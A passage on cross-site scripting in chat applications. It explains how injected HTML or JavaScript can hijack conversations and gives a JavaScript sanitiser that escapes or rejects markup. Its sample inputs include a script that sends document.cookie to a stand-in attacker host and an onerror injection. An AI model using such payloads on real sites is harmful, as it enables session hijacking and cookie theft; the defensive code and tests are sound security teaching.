Although displaying an image in a chat is not in itself a bad thing, the user
managed to send it only by injecting HTML into the message. In exactly the same
way, somebody could inject JavaScript and hijack the conversation: read other
users' cookies, rewrite what they see, or send messages on their behalf.
What can we do? The old rules about XSS attacks still apply and are still the
best practice. Check every incoming message (the user data, not your own code)
for HTML markup and JavaScript syntax, and either replace the special
characters with their escaped representation before the message is shown to
anyone, or simply reject the message. contains a lot
more information if you want to learn every aspect of XSS attacks, and how to avoid

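The two options above, escaping the message or rejecting it outright, as an added example that is not code from the book or the chat application it describes. It assumes a Node.js server that runs a function on every chat message before broadcasting it; the function names, the `policy` parameter and the sample payloads are constructed for this example.

```javascript
// Added example: sanitising chat messages before they are broadcast.
// Two policies, matching the text: 'escape' (default) or 'reject'.

// Every character that can open or close markup, or end an attribute value,
// mapped to its HTML entity. One regex pass guarantees '&' is escaped once.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
  '/': '&#x2F;',
};

function escapeHtml(message) {
  return String(message).replace(/[&<>"'/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Conservative denylist for the 'reject' policy: anything that could start a
// tag or a javascript: URL. It deliberately also rejects harmless text such
// as "1 <b", because a chat user has no legitimate need to send markup.
const MARKUP_PATTERN = /<\s*\/?[a-z!?]|javascript\s*:/i;

function containsMarkup(message) {
  return MARKUP_PATTERN.test(String(message));
}

// Called for every message before it leaves the server.
// Returns { ok: true, text } or { ok: false, reason }.
function sanitizeChatMessage(message, policy = 'escape') {
  if (typeof message !== 'string') {
    return { ok: false, reason: 'message must be a string' };
  }
  if (policy === 'reject') {
    if (containsMarkup(message)) {
      return { ok: false, reason: 'markup is not allowed' };
    }
    return { ok: true, text: message };
  }
  return { ok: true, text: escapeHtml(message) };
}

// Constructed sample payloads: a normal message, the injected image from the
// text, a cookie-stealing script, and an event-handler injection.
const SAMPLES = [
  'hello everyone',
  '<img src="http://example.invalid/cat.png">',
  '<script>location="http://attacker.invalid/?c="+document.cookie</script>',
  '<img src=x onerror="alert(1)">',
];

for (const sample of SAMPLES) {
  console.log('escape:', sanitizeChatMessage(sample, 'escape'));
  console.log('reject:', sanitizeChatMessage(sample, 'reject'));
}
```

Escaping is the safer default: a denylist such as `MARKUP_PATTERN` can always be outrun by a new encoding trick, whereas escaped text cannot become markup no matter what it contains. Whichever policy you choose, the client should still insert the received text with `textContent` (or the equivalent in your templating library) rather than `innerHTML`, so a message that slips past the server is displayed as text rather than executed.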